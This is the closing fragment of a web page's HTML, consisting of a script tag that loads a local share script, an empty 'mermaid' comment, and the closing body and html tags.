            <script src="/scripts/share.js?v=20211217" async></script>
        
        <!-- mermaid -->
        
    </body>
</html>
